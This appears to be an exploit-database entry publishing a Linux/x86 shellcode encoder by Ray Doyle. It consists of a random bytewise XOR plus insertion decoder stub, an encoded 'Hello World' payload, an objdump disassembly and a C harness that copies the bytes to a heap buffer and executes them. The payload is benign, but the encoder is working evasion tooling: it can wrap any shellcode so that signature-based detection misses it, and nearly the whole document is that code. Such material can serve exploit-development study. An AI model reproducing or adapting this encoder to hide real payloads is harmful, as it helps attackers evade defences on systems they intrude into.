Linux/x86 - echo "Hello World" + Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)



EKU-ID: 7978 CVE: OSVDB-ID:
Author: Ray Doyle Published: 2018-09-17 Verified: Verified



/*
# Title: Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)
# Date: 2018-09-13
# Author: Ray Doyle (@doylersec)
# Homepage: https://www.doyler.net
# Tested on: Linux/x86
# gcc -o xor_encoded_shellcode -z execstack -fno-stack-protector xor_encoded_shellcode.c
*/
 
/****************************************************
Disassembly of section .text:
 
08048060 <_start>:
 8048060:   eb 2f                   jmp    8048091 <find_address>
 
08048062 <decoder>:
 8048062:   5f                      pop    edi
 8048063:   57                      push   edi
 8048064:   5e                      pop    esi
 
08048065 <get_key>:
 8048065:   8a 07                   mov    al,BYTE PTR [edi]
 8048067:   6a 90                   push   0xffffff90
 8048069:   5b                      pop    ebx
 804806a:   3c aa                   cmp    al,0xaa
 804806c:   74 0a                   je     8048078 <decode_insertion>
 804806e:   30 d8                   xor    al,bl
 
08048070 <decode_xor>:
 8048070:   30 07                   xor    BYTE PTR [edi],al
 8048072:   47                      inc    edi
 8048073:   30 07                   xor    BYTE PTR [edi],al
 8048075:   47                      inc    edi
 8048076:   eb ed                   jmp    8048065 <get_key>
 
08048078 <decode_insertion>:
 8048078:   8d 3e                   lea    edi,[esi]
 804807a:   31 c0                   xor    eax,eax
 804807c:   31 db                   xor    ebx,ebx
 
0804807e <insertion_decoder>:
 804807e:   8a 1c 06                mov    bl,BYTE PTR [esi+eax*1]
 8048081:   80 f3 90                xor    bl,0x90
 8048084:   75 10                   jne    8048096 <encoded>
 8048086:   8a 5c 06 01             mov    bl,BYTE PTR [esi+eax*1+0x1]
 804808a:   88 1f                   mov    BYTE PTR [edi],bl
 804808c:   47                      inc    edi
 804808d:   04 02                   add    al,0x2
 804808f:   eb ed                   jmp    804807e <insertion_decoder>
 
08048091 <find_address>:
 8048091:   e8 cc ff ff ff          call   8048062 <decoder>
 
08048096 <encoded>:
 8048096:   b7 cc                   mov    bh,0xcc
 8048098:   3d ba 0a ab f3          cmp    eax,0xf3ab0aba
 804809d:   a3 9b bb 01 95          mov    ds:0x9501bb9b,eax
 80480a2:   75 d4                   jne    8048078 <decode_insertion>
 80480a4:   bc f7 fa d9 1c          mov    esp,0x1cd9faf7
 80480a9:   8d                      (bad) 
 80480aa:   d5 1c                   aad    0x1c
 80480ac:   f7 56 73                not    DWORD PTR [esi+0x73]
 80480af:   31 ef                   xor    edi,ebp
 80480b1:   cd a9                   int    0xa9
 80480b3:   34 12                   xor    al,0x12
 80480b5:   4f                      dec    edi
 80480b6:   50                      push   eax
 80480b7:   40                      inc    eax
 80480b8:   71 d0                   jno    804808a <insertion_decoder+0xc>
 80480ba:   94                      xchg   esp,eax
 80480bb:   c4                      (bad) 
 80480bc:   f7 d7                   not    edi
 80480be:   7f ee                   jg     80480ae <encoded+0x18>
 80480c0:   62                      (bad) 
 80480c1:   c3                      ret   
 80480c2:   48                      dec    eax
 80480c3:   03 d3                   add    edx,ebx
 80480c5:   8e 76 66                mov    ?,WORD PTR [esi+0x66]
 80480c8:   2c 54                   sub    al,0x54
 80480ca:   0c 78                   or     al,0x78
 80480cc:   05 6a 37 58 e4          add    eax,0xe458376a
 80480d1:   8b dc                   mov    ebx,esp
 80480d3:   04 3b                   add    al,0x3b
 80480d5:   ce                      into  
 80480d6:   b6 4a                   mov    dh,0x4a
 80480d8:   af                      scas   eax,DWORD PTR es:[edi]
 80480d9:   53                      push   ebx
 80480da:   59                      pop    ecx
 80480db:   a6                      cmps   BYTE PTR ds:[esi],BYTE PTR es:[edi]
 80480dc:   b5 05                   mov    ch,0x5
 80480de:   f7 30                   div    DWORD PTR [eax]
 80480e0:   15 ea eb 09 9c          adc    eax,0x9c09ebea
 80480e5:   60                      pusha 
 80480e6:   e4 10                   in     al,0x10
 80480e8:   7d cc                   jge    80480b6 <encoded+0x20>
 80480ea:   56                      push   esi
 80480eb:   cc                      int3  
 80480ec:   aa                      stos   BYTE PTR es:[edi],al
****************************************************/
 
#include<stdlib.h>
#include<stdio.h>
#include<string.h>
 
/*
 * Decoder stub: 56 bytes when the escapes below are counted.  It is two
 * bytes longer than the 54-byte build shown in the objdump listing above:
 * this array starts with "eb 31" rather than "eb 2f" and carries an extra
 * "ff e6" immediately before the final "e8" call.  No byte is 0x00, which is
 * why main() can size it with strlen().
 */
unsigned char stub[] = \
"\xeb\x31\x5f\x57\x5e\x8a\x07\x6a\x90\x5b\x3c\xaa\x74\x0a\x30\xd8\x30\x07\x47\x30\x07\x47\xeb\xed\x8d\x3e\x31\xc0\x31\xdb\x8a\x1c\x06\x80\xf3\x90\x75\x12\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xff\xe6\xe8\xca\xff\xff\xff";
 
/*
 * Encoded payload: 87 bytes, the 0x8048096..0x80480ec range that objdump
 * labels <encoded> above (the "(bad)" lines there are this data disassembled
 * as if it were code).  The last byte, 0xaa, is the value get_key compares
 * against ("cmp al,0xaa") to leave the XOR loop.  No byte is 0x00, so
 * strlen() in main() yields the full length.
 */
unsigned char shellcode[] = \
"\xb7\xcc\x3d\xba\x0a\xab\xf3\xa3\x9b\xbb\x01\x95\x75\xd4\xbc\xf7\xfa\xd9\x1c\x8d\xd5\x1c\xf7\x56\x73\x31\xef\xcd\xa9\x34\x12\x4f\x50\x40\x71\xd0\x94\xc4\xf7\xd7\x7f\xee\x62\xc3\x48\x03\xd3\x8e\x76\x66\x2c\x54\x0c\x78\x05\x6a\x37\x58\xe4\x8b\xdc\x04\x3b\xce\xb6\x4a\xaf\x53\x59\xa6\xb5\x05\xf7\x30\x15\xea\xeb\x09\x9c\x60\xe4\x10\x7d\xcc\x56\xcc\xaa";
 
/*
 * Heap buffer that main() fills with stub followed by shellcode and then
 * jumps to.  The stub writes back into this buffer while decoding (the
 * "xor BYTE PTR [edi],al" / "mov BYTE PTR [edi],bl" stores in the listing),
 * so the memory must be writable as well as executable.
 */
unsigned char* code;
 
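/*
 * Test harness: concatenates the decoder stub and the encoded payload into
 * one heap buffer, prints the sizes and transfers control to the buffer.
 *
 * The buffer has to be writable (the stub decodes in place) and executable.
 * An ordinary malloc() page is not executable, so this harness presumably
 * relies on the "-z execstack" flag in the build line of the header comment
 * to get an executable heap -- confirm for the target toolchain; without it
 * ret() faults immediately.
 *
 * Returns 0 if control ever comes back from the payload, EXIT_FAILURE when
 * the buffer cannot be allocated.
 */
int main(void)
{
    /* Neither array contains a NUL byte, so strlen() is the full length.
     * The casts silence the unsigned char* -> const char* mismatch. */
    size_t stub_len = strlen((const char *)stub);
    size_t shellcode_len = strlen((const char *)shellcode);
    size_t total_len = stub_len + shellcode_len;

    /* size_t must be printed with %zu; the original %d was undefined
     * behaviour. */
    printf("\nStub Length: %zu\n", stub_len);
    printf("Shellcode Length: %zu\n\n", shellcode_len);
    printf("Total Length: %zu\n\n", total_len);

    code = malloc(total_len);
    if (code == NULL) {
        perror("malloc");
        return EXIT_FAILURE;
    }
    memcpy(code, stub, stub_len);
    memcpy(code + stub_len, shellcode, shellcode_len);

    /* The stub's first instruction sits at code[0]. */
    int (*ret)(void) = (int (*)(void))code;
    ret();

    return 0;
}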